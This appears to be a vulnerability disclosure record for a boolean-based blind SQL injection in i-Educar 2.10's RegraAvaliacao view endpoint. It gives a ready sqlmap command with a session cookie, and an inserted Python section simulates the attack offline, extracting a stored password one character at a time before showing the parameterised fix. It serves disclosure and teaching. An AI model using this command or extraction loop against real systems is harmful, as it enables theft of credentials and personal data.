Submission #635801: Portabilis i-Educar 2.10 SQL Injection
Info

Title: Portabilis i-Educar 2.10 SQL Injection
Description:
SQL Injection (Boolean-Based) Vulnerability in id Parameter on /RegraAvaliacao/view?id=[id] Endpoint

Summary
A SQL injection vulnerability was identified in the /module/RegraAvaliacao/view?id=[id] endpoint of the i-educar application, specifically in the id parameter. It allows an attacker to execute arbitrary SQL statements against the backend database, compromising the confidentiality, integrity and availability of application data.

Details
Vulnerable endpoint: /module/RegraAvaliacao/view?id=[id]
Parameter: id
The application does not validate or sanitize the value of the id parameter before using it in a database query, so a crafted value is executed by the database as part of the statement. The response differs depending on whether an injected condition is true or false, which makes the injection boolean-based blind: query output is never shown directly, but an attacker can infer data one comparison at a time. This permits database enumeration, data exfiltration, data modification, or denial of service via time-based delays.

PoC (step by step)
Install sqlmap and run the command below. Note that the request carries an i_educar_session cookie, so the test is run as an authenticated user:

sqlmap -u "http://localhost:8086/module/RegraAvaliacao/view?id=1" -p id --cookie="i_educar_session=qEk2wbjxS5IbECJGqnIa0dbmIyI3XIsXqm3WSh6K" \
  --dbms=PostgreSQL --technique=B --dbs --batch

sqlmap tests a series of SQL injection payloads against the id parameter until it finds a working boolean-based blind injection:
image 1: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi6.png
After a while, sqlmap lists the available databases, confirming the injection:
image 2: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi7.png
Continuing with sqlmap to discover tables and columns, it becomes possible to enumerate this information:
image 3: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi8.png

Impact
- Unauthorized data access: reading sensitive information such as credentials, personal data or configuration details.
- Database enumeration: extracting the database schema, tables and column details.
- Data manipulation: adding, modifying or deleting database records.
- Denial of service (DoS): using time-based queries to degrade system availability.
- Potential escalation to RCE: if combined with other vulnerabilities and specific database features.

Finder
Discovered by Karina Gante.
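The boolean-based blind technique that sqlmap applies above, as an added example that is not code from the advisory or from the i-educar project: a constructed SQLite-backed stand-in for the vulnerable handler (the untrusted id concatenated into the query text), a true/false oracle built on it, character-by-character extraction through that oracle, and the parameterised handler that closes the hole. The schema, table and column names (regra_avaliacao, usuario, senha) are made up for the demo, SQLite stands in for PostgreSQL, and its unicode() function replaces PostgreSQL's ascii().

```python
"""Boolean-based blind SQL injection, simulated offline (added example).

Not code from the advisory or from i-educar. SQLite stands in for PostgreSQL,
the schema below is constructed for the demo, and the handler only copies the
reported bug pattern: the `id` query parameter is concatenated into the SQL text.
"""
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed sample database: one rules row and one user with a secret."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE regra_avaliacao (id INTEGER PRIMARY KEY, nome TEXT);
        INSERT INTO regra_avaliacao VALUES (1, 'Regra padrao');
        CREATE TABLE usuario (id INTEGER PRIMARY KEY, login TEXT, senha TEXT);
        INSERT INTO usuario VALUES (1, 'admin', 's3cr3t');
        """
    )
    return conn


def view_vulnerable(conn: sqlite3.Connection, id_param: str):
    """Vulnerable handler: the id value is spliced into the statement unescaped."""
    sql = "SELECT nome FROM regra_avaliacao WHERE id = " + id_param
    return conn.execute(sql).fetchone()


def view_fixed(conn: sqlite3.Connection, id_param: str):
    """Hardened handler: enforce the expected type, then bind the value."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT nome FROM regra_avaliacao WHERE id = ?"
    return conn.execute(sql, (int(id_param),)).fetchone()


def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean oracle: True when the page still shows the record after appending
    `AND (condition)` to the real id, i.e. the injected condition held."""
    return view_vulnerable(conn, "1 AND (" + condition + ")") is not None


def extract(conn: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` one character at a time, using a
    binary search over the code point of each position (the approach behind
    sqlmap's --technique=B). unicode() is SQLite's equivalent of ascii()."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length(({subquery})) >= {pos}"):
            break  # string ended
        lo, hi = 0, 127
        while lo < hi:  # invariant: the code point lies in [lo, hi]
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo() -> dict:
    """Run the attack against the vulnerable handler; show the fixed one refuses it."""
    conn = setup_db()
    secret = extract(conn, "SELECT senha FROM usuario WHERE login = 'admin'")
    try:
        view_fixed(conn, "1 AND 1=1")
        fixed_rejects = False
    except ValueError:
        fixed_rejects = True
    return {
        "true_branch": oracle(conn, "1=1"),
        "false_branch": oracle(conn, "1=2"),
        "leaked_senha": secret,
        "fixed_rejects_payload": fixed_rejects,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The oracle is the whole attack: each request answers one yes/no question, so seven requests per character suffice to read any value the database user can select. Against PostgreSQL the same loop would use ascii(substr(...)) and the real column names discovered in the enumeration step; the fix is the same in either case, namely to reject anything that is not an integer and pass the value as a bound parameter rather than as query text.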
Source: https://github.com/KarinaGante/KGSec/blob/main/CVEs/i-educar/12.md
User: karinagante (UID 88113)
Submission: 16/08/2025 01:12 AM (10 months ago)
Moderation: 27/08/2025 09:34 AM (11 days later)
Status: Accepted
VulDB Entry: 321551 [Portabilis i-Educar up to 2.10 /RegraAvaliacao/view id sql injection]
Points: 20
